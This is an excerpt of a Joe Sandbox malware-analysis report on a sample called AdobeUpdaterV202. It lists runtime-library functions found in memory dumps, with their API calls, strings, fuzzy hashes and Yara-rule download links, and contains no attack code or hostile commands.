Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 4a58cc5ea0f5db8c9aac344eb242e6de801daa37c502630ff08584e64ef76383
Instruction ID: 66c19a5b8186f07b76af97f737ad56503cb0ffd439e31218692ec8f31ef70a80
Opcode Fuzzy Hash: 4a58cc5ea0f5db8c9aac344eb242e6de801daa37c502630ff08584e64ef76383
Instruction Fuzzy Hash: C7B1EF74A04249AFDB15DF98D880BBEBBF5BF8B304F149199E550BF292C770A941CB60

Function 00EA98B9 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(008E9028,008E9028,?,7FFFFFFF,?,00EA9B89,008E9028,008E9028,?,008E9028,?,?,?,?,008E9028,?), ref: 00EA995F
__alloca_probe_16.LIBCMT ref: 00EA9A1A
__alloca_probe_16.LIBCMT ref: 00EA9AA9
__freea.LIBCMT ref: 00EA9AF4
__freea.LIBCMT ref: 00EA9AFA
__freea.LIBCMT ref: 00EA9B30
__freea.LIBCMT ref: 00EA9B36
__freea.LIBCMT ref: 00EA9B46

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 3d13737a18aebf628d4c639dcbdb4529276d4b4cf6bc1c58b3123418a84efbcf
Instruction ID: d6cccf7f4179006bb7e741b3f9ab6b8a7e253ca18f375fd2d4a0dbc8e547a602
Opcode Fuzzy Hash: 3d13737a18aebf628d4c639dcbdb4529276d4b4cf6bc1c58b3123418a84efbcf
Instruction Fuzzy Hash: 7971B3729002096BDF219A649C82FAF77E9DF8F318F252059E815BF292D735AD01C764

Function 00E9429A Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00E942E3
__alloca_probe_16.LIBCMT ref: 00E9430F
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00E9434E
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E9436B
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00E943AA
__alloca_probe_16.LIBCMT ref: 00E943C7
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E94409
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00E9442C

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: a8c5fdb113358540eb88ee1d9615bd49dce463e3225d6b52d06c17aa9a75ab86
Instruction ID: ee326f976f351e4463ddcd7406c4873eee018c4cfeaecfdfee75d0f232b7be38
Opcode Fuzzy Hash: a8c5fdb113358540eb88ee1d9615bd49dce463e3225d6b52d06c17aa9a75ab86
Instruction Fuzzy Hash: 9F518DB250020AAFEF209F64CC85FAF7BBAEF44759F155125FD15B6190D7309C128BA0

Function 00E97680 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00E976B7
___except_validate_context_record.LIBVCRUNTIME ref: 00E976BF
_ValidateLocalCookies.LIBCMT ref: 00E97748
__IsNonwritableInCurrentImage.LIBCMT ref: 00E97773
_ValidateLocalCookies.LIBCMT ref: 00E977C8

Strings

csm, xrefs: 00E9775D

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 212ba3d15d96aae7ed39f5ddc8215b54c407e7ab759ef0c2f0ec8cbc5dd2f6c4
Instruction ID: 0d5a44efc33d6a11f7265c2f08a3bb553b5d8445da63f80ce4513e1a864e8af3
Opcode Fuzzy Hash: 212ba3d15d96aae7ed39f5ddc8215b54c407e7ab759ef0c2f0ec8cbc5dd2f6c4
Instruction Fuzzy Hash: 3641C334A142199FCF10DFA8CC85A9E7BF1BF46315F149096E854BB392D731AD09CB90

Function 00E920F3 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00E920FA
std::_Lockit::_Lockit.LIBCPMT ref: 00E92104
int.LIBCPMT ref: 00E9211B

Part of subcall function 00E92653: std::_Lockit::_Lockit.LIBCPMT ref: 00E92664
Part of subcall function 00E92653: std::_Lockit::~_Lockit.LIBCPMT ref: 00E9267E

codecvt.LIBCPMT ref: 00E9213E
std::_Facet_Register.LIBCPMT ref: 00E92155
std::_Lockit::~_Lockit.LIBCPMT ref: 00E92175
Concurrency::cancel_current_task.LIBCPMT ref: 00E92182

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID:
API String ID: 2133458128-0
Opcode ID: 631ac4dd8291474176b93c27c3091ba7503135ef2a1ec348e8ff0578a2ae8869
Instruction ID: c7a1a1dd01ed935090d53fff52c4178ea93c6eb337942c61fe89ceb05fdc7196
Opcode Fuzzy Hash: 631ac4dd8291474176b93c27c3091ba7503135ef2a1ec348e8ff0578a2ae8869
Instruction Fuzzy Hash: EB01CC75901219ABCF05EBA4C816AAEB7A6BF84714F24550DF6107B292DFB09E06DB80

Function 00E92188 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00E9218F
std::_Lockit::_Lockit.LIBCPMT ref: 00E92199
int.LIBCPMT ref: 00E921B0

Part of subcall function 00E92653: std::_Lockit::_Lockit.LIBCPMT ref: 00E92664
Part of subcall function 00E92653: std::_Lockit::~_Lockit.LIBCPMT ref: 00E9267E

ctype.LIBCPMT ref: 00E921D3
std::_Facet_Register.LIBCPMT ref: 00E921EA
std::_Lockit::~_Lockit.LIBCPMT ref: 00E9220A
Concurrency::cancel_current_task.LIBCPMT ref: 00E92217

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
String ID:
API String ID: 2958136301-0
Opcode ID: 283e1cf5dd67dd36751f8c791565e7c8611ca8b02248a9161dbb5b581278647f
Instruction ID: 91728cdd243ddeab66470ca811867104f4ec1010a30df09e26884fa2be5f5f50
Opcode Fuzzy Hash: 283e1cf5dd67dd36751f8c791565e7c8611ca8b02248a9161dbb5b581278647f
Instruction Fuzzy Hash: 9E01DE7590011AABCF05EBA0C806ABEB7F5BF84714F24140DE5107B2E2DFB09E05DB91

Function 00E9787A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00E97871,00E95E40,00E94F12), ref: 00E97888
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E97896
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E978AF
SetLastError.KERNEL32(00000000,00E97871,00E95E40,00E94F12), ref: 00E97901

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: d8ac672223cf029f9f391a8f1826e9ed333e98190f204624b6d868c5b31a7dc0
Instruction ID: f6972bd55d8e0f02485ad70eff497f6d264fa5713332d5992deaa56a814f47d6
Opcode Fuzzy Hash: d8ac672223cf029f9f391a8f1826e9ed333e98190f204624b6d868c5b31a7dc0
Instruction Fuzzy Hash: 1201F53232C2265EEEB82778AC8D59A3A94FF023B5730222EF420711E1EF514C19A194

Function 00E9C13F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,DFBDDF9F,?,?,00000000,00EAB0F9,000000FF,?,00E9C0CF,?,?,00E9C0A3,00000000), ref: 00E9C174
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E9C186
FreeLibrary.KERNEL32(00000000,?,00000000,00EAB0F9,000000FF,?,00E9C0CF,?,?,00E9C0A3,00000000), ref: 00E9C1A8

Strings

CorExitProcess, xrefs: 00E9C17E
mscoree.dll, xrefs: 00E9C16D

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9e229afa4fc9a4470e47be03d561758e96cc23e5629a0179a35073cb1312d854
Instruction ID: bb6b09f96bef3c88e57e23191e3fb0e6d7a9d2adabeaad535894d1db3088787c
Opcode Fuzzy Hash: 9e229afa4fc9a4470e47be03d561758e96cc23e5629a0179a35073cb1312d854
Instruction Fuzzy Hash: 0001D671A44759FFDB119F92DC49FAEBBB9FB49B14F000125F812B26E0DB74A804CA90

Function 00EA29E1 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00EA2A68
__alloca_probe_16.LIBCMT ref: 00EA2B29
__freea.LIBCMT ref: 00EA2B90

Part of subcall function 00EA1DC1: HeapAlloc.KERNEL32(00000000,00E91FA6,?,?,00E957EA,?,?,?,00000000,?,00E917E2,00E91FA6,?,?,?,?), ref: 00EA1DF3

__freea.LIBCMT ref: 00EA2BA5
__freea.LIBCMT ref: 00EA2BB5

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 262cbc630ecd011e40cbb978b0bc4be5d0e54ed5acc6107064434bcfd49b5395
Instruction ID: f21556953c3f8fd1f0d1f7f7cf5021f05883ed1c0520c5149daa706a90068683
Opcode Fuzzy Hash: 262cbc630ecd011e40cbb978b0bc4be5d0e54ed5acc6107064434bcfd49b5395
Instruction Fuzzy Hash: B251B172600216ABEF249E68CC81EBB3BE9EF4A714B15156CFE04FA250E731ED108760

Function 00E93BCF Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00E93BD6
std::_Lockit::_Lockit.LIBCPMT ref: 00E93BE1
std::_Lockit::~_Lockit.LIBCPMT ref: 00E93C4F

Part of subcall function 00E93D32: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00E93D4A

std::locale::_Setgloballocale.LIBCPMT ref: 00E93BFC
_Yarn.LIBCPMT ref: 00E93C12

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 809b95c57fe1593d251b20f8fba7608a82ced9547860faeb987fec05f62fbbef
Instruction ID: ad467c95ae187b574e469a0cba65983ef70841170de1555fa9eba367979a8733
Opcode Fuzzy Hash: 809b95c57fe1593d251b20f8fba7608a82ced9547860faeb987fec05f62fbbef
Instruction Fuzzy Hash: A601BCB5A011159BCF0AEB30C85593CBBB5BF99740B141009E80277391CF74AF02DB85

Function 00EA0A0E Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 173COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA0BA6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA0BB9

Strings

, xrefs: 00EA0A8D
, xrefs: 00EA0AAF

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: $
API String ID: 885266447-2088381004
Opcode ID: f5204038756f00fa8ba6baa6557752d8a6f12e633af3e82672063c613825e01c
Instruction ID: 99016b8ebf2c8504ef4e6be0c4a090a0898f86758066c096f274c117c69e6c97
Opcode Fuzzy Hash: f5204038756f00fa8ba6baa6557752d8a6f12e633af3e82672063c613825e01c
Instruction Fuzzy Hash: B7515071A00249AFCF14CF98C991EEEBBB2EB4E358F149159E955AB351D330AE41CB60

Function 00E92391 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00E92398
std::_Lockit::_Lockit.LIBCPMT ref: 00E923A5
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00E923E2

Part of subcall function 00E93CCD: _Yarn.LIBCPMT ref: 00E93CEC
Part of subcall function 00E93CCD: _Yarn.LIBCPMT ref: 00E93D10

Strings

bad locale name, xrefs: 00E923F3

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 482894088-1405518554
Opcode ID: fcf6b5267e7e202a555d2c9f44c868e3de55b8ae9aa633b8caeced8c7c0fabaf
Instruction ID: 3be9b361b0d64d8e7ca3b2d819bf692db5bacc8592bf837a4f9b67e70ecaff5a
Opcode Fuzzy Hash: fcf6b5267e7e202a555d2c9f44c868e3de55b8ae9aa633b8caeced8c7c0fabaf
Instruction Fuzzy Hash: 3E0180715057849FCB309FAA948158AFEE0BF29350750996FE18DA7B02C770A600CBA9

Function 00E989C2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00EB4FF0,00000000,00000800,?,00E98973,00000000,?,00000000,?,?,?,00E98A9D,00000002,FlsGetValue,00EAEC68,FlsGetValue), ref: 00E989CF
GetLastError.KERNEL32(?,00E98973,00000000,?,00000000,?,?,?,00E98A9D,00000002,FlsGetValue,00EAEC68,FlsGetValue,00000000,?,00E9792D), ref: 00E989D9
LoadLibraryExW.KERNEL32(00EB4FF0,00000000,00000000,?,00EB4FF0,?,?,?,00E916D9,?,00E916D9,?), ref: 00E98A01

Strings

api-ms-, xrefs: 00E989E6

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 84ce26be4dcc0660c851b7e5e8562f95cae44515eaec31e0b4352ce1ccaa0cd0
Instruction ID: 31fd68b75579fa293d3592454813e49ae0ad0d5cb65f2e3f8243dd5abbac5ceb
Opcode Fuzzy Hash: 84ce26be4dcc0660c851b7e5e8562f95cae44515eaec31e0b4352ce1ccaa0cd0
Instruction Fuzzy Hash: C5E04870244344BFEF105F62DE46B583E569F17B54F145021FA0DF84F1EBA1E8558584

Function 00E9FB8E Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(DFBDDF9F,00000000,00000000,00000000), ref: 00E9FBF1

Part of subcall function 00EA3BF4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00EA2B86,?,00000000,-00000008), ref: 00EA3CA0

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E9FE4C
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00E9FE94
GetLastError.KERNEL32 ref: 00E9FF37

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: b41360838bc8659674034152e40ecd5ca63bdc2f158d22179df145c0c382c0f5
Instruction ID: 9c2bfa02b2f389c3bd55a233e39d1ff2d01f433db526e39ad25b82547affd2a1
Opcode Fuzzy Hash: b41360838bc8659674034152e40ecd5ca63bdc2f158d22179df145c0c382c0f5
Instruction Fuzzy Hash: 26D146B5E102489FCF15CFA8D880AEDBBB5FF09314F18856AE855FB251DB30A942CB50

Function 00E97991 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00E97A58
___AdjustPointer.LIBCMT ref: 00E97A7B
___AdjustPointer.LIBCMT ref: 00E97B17

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: a727e4805c7e572793a6957c6b3ce4900fb1ff0754272355039a35bb5d1bef4c
Instruction ID: 0c3b67a63ff3185d88dc2aeb0f5db1604c564f7db920e83457e4bd7c9e4437b6
Opcode Fuzzy Hash: a727e4805c7e572793a6957c6b3ce4900fb1ff0754272355039a35bb5d1bef4c
Instruction Fuzzy Hash: 24511472618602AFDF298F55C841BBE77A1FF40314F18212DE88177291E7B0EE88C790

Function 00EA4010 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00EA3BF4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00EA2B86,?,00000000,-00000008), ref: 00EA3CA0

GetLastError.KERNEL32 ref: 00EA4074
__dosmaperr.LIBCMT ref: 00EA407B
GetLastError.KERNEL32(?,?,?,?), ref: 00EA40B5
__dosmaperr.LIBCMT ref: 00EA40BC

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 58b0d9051673a7034df07c333ef70170f666d749418cd7a2ddbed93ae0001ffe
Instruction ID: 8dd3020a7f8f4995fd50c96739f1cd520e9f373256de9073a9dd46602ca9ca56
Opcode Fuzzy Hash: 58b0d9051673a7034df07c333ef70170f666d749418cd7a2ddbed93ae0001ffe
Instruction Fuzzy Hash: BC21D8B1600305AFCB20AF719DC186BB7EDEF8A3647009518FA25BB591D7B1FC509752

Function 00E9B369 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a436285c5a8482067bd8b11467ddaf33dc4d6d1a03e855b040c342a2b88276c
Instruction ID: 1d5a5a7442404c01dcb086e8b468368d98cd509a68ecbbac4890636fd9e720fc
Opcode Fuzzy Hash: 2a436285c5a8482067bd8b11467ddaf33dc4d6d1a03e855b040c342a2b88276c
Instruction Fuzzy Hash: 21216231604205AF9F20EF61AE8197FB7EAEF453687109514F925B7152E770EC50A760

Function 00EA4FA6 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00EA4FAE

Part of subcall function 00EA3BF4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00EA2B86,?,00000000,-00000008), ref: 00EA3CA0

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EA4FE6
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EA5006

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

